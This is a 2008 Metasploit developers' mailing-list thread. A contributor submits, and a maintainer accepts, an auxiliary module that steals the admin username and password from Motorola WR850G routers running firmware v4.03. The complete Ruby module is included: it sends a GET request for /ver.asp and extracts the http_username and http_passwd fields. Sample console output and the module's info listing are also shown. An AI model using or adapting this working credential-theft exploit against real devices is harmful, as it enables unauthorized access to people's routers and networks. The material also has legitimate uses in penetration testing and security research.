Applied. Thanks! Best regards, Ramon
On Sun, 2008-10-05 at 00:56 -0500, Kris Katterjohn wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hey guys, > > I've attached a new auxiliary module for obtaining the login credentials to a > Motorola WR850G router with firmware v4.03. I just put it under admin, but > there is probably a better place for it. > > > msf auxiliary(wr850g_cred) > run > [*] Found username "xxxx" and password "yyyy" > [*] Auxiliary module execution completed > > > msf > info admin/wr850g_cred > > Name: Motorola WR850G v4.03 Credentials > Version: 1 > > Provided by: > Kris Katterjohn <[EMAIL PROTECTED]> > > Basic options: > Name Current Setting Required Description > ---- --------------- -------- ----------- > RHOST yes The target address > RPORT 80 yes The target port > > Description: > Login credentials to the Motorola WR850G router with firmware v4.03 > can be obtained via a simple GET request if issued while the > administrator is logged in. A lot more information is available > through this request, but you can get it all and more after logging > in. > > > This was disclosed back in Sep 2004, but I still easily found one lying around > with this firmware. > > Thanks, > Kris Katterjohn > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iQIVAwUBSOhXA/9K37xXYl36AQJ9Ww//e5dyR9E4yqoIYYqARyOlyJ47mAQvxmpK > mmsLFjOQaqmupEpb7fk85zB3YEHqgYwDp6eLKgsZ4T0xGjmq4PcE1JH8c5L5Vdwd > p9lx1HLkzU759Dk9azcHDhTDSYsvGxxuVShbQiYLX8G0u+M8toiJqJ9iFNFkc3mO > sDP681NG7hG0i8kB0myWkXBhuVk+qc5S1hThmaCyqTNKFnjckCfRvsU/8Y1/IiOp > of0LGIayxn4RPhPXMpaXxowhEE+ey5xMKgYpkl7c7Rg7+fAU5LIHQwUEBlP1szv9 > 9CXuB5WNl8wMSGGZ62ktu3zQIi901LEQxO7W87KmePi7g087tBu60EM5+gz/qIto > xuxvToutzlBAdhtxKx09XRXTlcRlm3P/AxXJP7neXP8QxEwgR3swsPtTzf0vMOb5 > vykTFSBrhbWP13WIhNH8gPN5zOEXV8RzY4pbJklSZ106TTDRH2dY6b8eLA2jW03L > 2BtJAhO6GFL5cYbf28r2yIIqFauy13MGgqhjI/p/rRsxYAMh7ITL5388YVLm+QYd > vAPxGxztIla2MHeB/C6sAzj9+U2db/ItISg+W1Cn56+Mhkcou8Nd4NIqlhZbzwUm > v3u3SoToa6f0GpAlTyjqwf0+ydHmWL+xRbiIb0pJQJzEohkksf9/6uBQ1B/08wyn > YKKXU8cKEmk= > =VU+S > -----END PGP SIGNATURE----- > plain text document attachment (wr850g_cred.rb) > require 'msf/core' > > class Metasploit3 < Msf::Auxiliary > > include Msf::Exploit::Remote::Tcp > > def initialize(info = {}) > super(update_info(info, > 'Name' => 'Motorola WR850G v4.03 Credentials', > 'Description' => %q{ > Login credentials to the Motorola WR850G router > with > firmware v4.03 can be obtained via a simple GET > request > if issued while the administrator is logged in. > A lot > more information is available through this > request, but > you can get it all and more after logging in. > }, > 'Author' => 'Kris Katterjohn <[EMAIL > PROTECTED]>', > 'License' => MSF_LICENSE, > 'Version' => '1', > 'References' => > [ [ 'URL', > 'http://seclists.org/bugtraq/2004/Sep/0339.html'] ], > 'DisclosureDate' => 'Sep 24 2004')) > > register_options([Opt::RPORT(80)]) > end > > def run > connect > > sock.put("GET /ver.asp HTTP/1.0\r\n\r\n") > response = sock.get > > disconnect > > if response.nil? or response.empty? > print_status("No response from server") > return > end > > # 302 Redirect > if response.split(/\r\n/)[0] !~ /200 Ok/ > print_status("Administrator not logged in") > return > end > > user = $1 if response.match("http_username=([^\n]*)<br>") > pass = $1 if response.match("http_passwd=([^\n]*)<br>") > > print_status("Found username \"#{user}\" and password > \"#{pass}\"") if user and pass > end > end > > _______________________________________________ > Framework-Hackers mailing list > Framework-Hackers@spool.metasploit.com > http://spool.metasploit.com/mailman/listinfo/framework-hackers _______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
